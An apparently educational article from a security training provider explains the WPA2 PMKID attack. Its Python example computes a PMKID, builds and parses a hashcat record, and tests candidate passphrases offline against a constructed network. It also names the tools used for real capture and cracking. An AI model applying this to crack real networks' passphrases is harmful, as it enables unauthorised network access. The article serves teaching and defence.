WPA2 PMKID Attack
Wireless attack capturing WPA2 Pairwise Master Key Identifier to enable offline passphrase cracking without client deauthentication.
The WPA2 PMKID attack is a wireless exploitation technique that captures the Pairwise Master Key Identifier from a WPA2 access point without requiring a connected client or a full four-way handshake. Discovered in 2018, it significantly simplified WPA2-PSK cracking by eliminating the need to deauthenticate clients.
The PMKID is carried in the first message of the WPA2 four-way handshake as part of the Robust Security Network Information Element. An attacker sends an association request to the access point, which answers with the PMKID in the first EAPOL frame, before any client has authenticated. The PMKID is calculated as HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), that is, the first 128 bits of the HMAC-SHA1 output, where the PMK is derived from the network passphrase. The attacker captures this single frame using tools like hcxdumptool and then performs offline cracking with hashcat or similar tools. Because the PMKID contains enough information to verify passphrase guesses, the attacker can test candidates without interacting further with the network.
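The formula above, worked through as an added example that is not part of the CDA article: it derives the PMK from a passphrase, computes the PMKID, parses a hashcat mode-22000 PMKID record, and checks whether a single candidate passphrase reproduces the captured value, which is exactly why the capture alone makes the passphrase the only remaining secret. The SSID, MAC addresses and passphrase are constructed for the example and the 22000 line is built from them rather than taken from a real capture.

```python
import hashlib
import hmac

# Constructed test network (assumption for this example, not a real capture).
SSID = "ExampleCorpWiFi"
MAC_AP = bytes.fromhex("001122334455")
MAC_STA = bytes.fromhex("66778899aabb")
PASSPHRASE = "correct horse battery"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): first 16 bytes of HMAC-SHA1."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def make_22000_line(passphrase: str, ssid: str, mac_ap: bytes, mac_sta: bytes) -> str:
    """Build a hashcat mode-22000 PMKID record: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***"""
    pmkid = compute_pmkid(derive_pmk(passphrase, ssid), mac_ap, mac_sta)
    return f"WPA*01*{pmkid.hex()}*{mac_ap.hex()}*{mac_sta.hex()}*{ssid.encode().hex()}***"


def parse_22000_pmkid(line: str) -> dict:
    """Parse a mode-22000 record of type 01 (PMKID); other types are rejected."""
    fields = line.strip().split("*")
    if len(fields) < 6 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a PMKID (type 01) record")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "mac_ap": bytes.fromhex(fields[3]),
        "mac_sta": bytes.fromhex(fields[4]),
        "ssid": bytes.fromhex(fields[5]).decode(),
    }


def candidate_matches(record: dict, candidate: str) -> bool:
    """Offline check: does this passphrase guess reproduce the captured PMKID?"""
    pmk = derive_pmk(candidate, record["ssid"])
    guess = compute_pmkid(pmk, record["mac_ap"], record["mac_sta"])
    return hmac.compare_digest(guess, record["pmkid"])


def self_check() -> bool:
    """Round trip: build a record, parse it, confirm only the right passphrase matches."""
    record = parse_22000_pmkid(make_22000_line(PASSPHRASE, SSID, MAC_AP, MAC_STA))
    return candidate_matches(record, PASSPHRASE) and not candidate_matches(record, "wrong")
```

The PBKDF2 step costs 4096 SHA-1 rounds per guess, so the only defense a PSK network has against this check is a passphrase with enough entropy that the guess space is not enumerable.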
The PMKID attack made WPA2-PSK cracking more reliable and stealthy than previous methods. Traditional handshake capture required either waiting for a legitimate client connection or performing deauthentication attacks that could trigger wireless IDS alerts. PMKID capture requires only a single frame exchange with the access point itself, reducing detection risk. This technique reinforced that WPA2-PSK security depends entirely on passphrase complexity.
CDA covers the PMKID attack within the VSD domain as part of wireless assessment methodology. Theater missions include practical PMKID capture and cracking exercises. Our approach emphasizes that this technique demonstrates the fundamental weakness of pre-shared key authentication, driving recommendations toward WPA2/WPA3-Enterprise for organizational networks.
Written by CDA Editorial